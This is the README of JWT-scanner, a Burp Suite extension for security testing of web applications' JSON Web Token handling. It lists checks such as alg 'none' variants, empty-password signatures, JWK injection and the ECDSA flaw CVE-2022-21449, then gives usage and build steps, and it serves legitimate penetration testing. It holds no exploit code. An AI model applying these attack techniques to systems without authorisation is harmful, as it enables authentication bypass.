Skip to content

CompassSecurity/jwt-scanner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

JWT-scanner - Burp Extension

Description

JWT Scanner is a Burp Suite extension for automated testing of Jason Web Token (JWT) implementations of web applications.

Checks

  • Signature presence
  • Invalid signatures
  • Signatures with empty passwords
  • Usage of algorithm none variations
  • Invalid ECDSA parameters (CVE-2022-21449)
  • JWT JWK injection

Features

  • Select base request and autodetection of JWT
  • Manually select target JWT in source request

Usage

Run an active scan or manually select a request from to check:

  1. Go to Proxy / Repeater / Target / Logger / Intruder
  2. Select request that requires a authentication with a valid JWT and returns a HTTP 200 response

NOTE: First the extension will resend the selected request without modification and check if the JWT is still valid. If not a Error will be displayed in the Event Log

Automatically detect JWT

  1. Right-click on the request you want to check.
  2. Extension -> JWT-scanner -> Autodetect JWT
  3. In case of a identified vulnerability a issue is generated

Autodetect JWT from valid request: img.png

Manually select JWT

  1. Highlight the target JWT in request
  2. Right-click highlighted JWT request
  3. Extension -> JWT-scanner -> Selected JWT
  4. In case of a identified vulnerability a issue is generated

Installation

  1. Download the latest pre-built jar file from releases.
  2. Extender -> Tab Installed -> Add -> Extension Details -> Extension Type: Java -> Select file ...
  3. Select the downloaded jar

Manually select JWT from valid request:

img_1.png

Build

Using maven to build jar file with dependencies:

mvn package -f pom.xml